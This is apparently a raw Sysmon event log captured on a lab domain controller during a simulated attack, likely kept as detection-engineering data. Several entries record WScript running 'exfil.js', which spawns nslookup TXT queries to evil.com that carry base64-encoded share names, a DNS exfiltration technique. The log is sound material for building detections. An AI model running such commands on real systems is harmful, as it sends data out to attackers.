14:21:44.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.697{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7545-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.697{2E1864BB-18F8-629A-7345-000000005F02}55444640C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-7545-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.702{2E1864BB-18F8-629A-7545-000000005F02}6372C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-7345-000000005F02}5544C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpzz.tmp 2>&1 10341000x8000000000000000213414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.675{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7445-000000005F02}5720C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.675{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7445-000000005F02}5720C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.659{2E1864BB-18F8-629A-7445-000000005F02}57207920C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7345-000000005F02}5544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7445-000000005F02}5720C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7345-000000005F02}5544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-18E0-629A-6742-000000005F02}3976336C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-7345-000000005F02}5544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.648{2E1864BB-18F8-629A-7345-000000005F02}5544C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpzz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmhb.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-18F8-629A-7145-000000005F02}22562848C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7245-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7245-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.596{2E1864BB-18F8-629A-7045-000000005F02}71842428C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-7245-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.603{2E1864BB-18F8-629A-7245-000000005F02}5836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-7045-000000005F02}7184C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmhb.tmp 2>&1 354300x8000000000000000213394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.154{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51094- 354300x8000000000000000213393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.154{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51093- 354300x8000000000000000213392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.153{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51092- 354300x8000000000000000213391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51091- 354300x8000000000000000213390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51090- 354300x8000000000000000213389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.058{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51089- 354300x8000000000000000213388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51088- 354300x8000000000000000213387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51087- 354300x8000000000000000213386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.993{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51086- 354300x8000000000000000213385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.950{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56428-false10.0.1.12-8089- 10341000x8000000000000000213384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 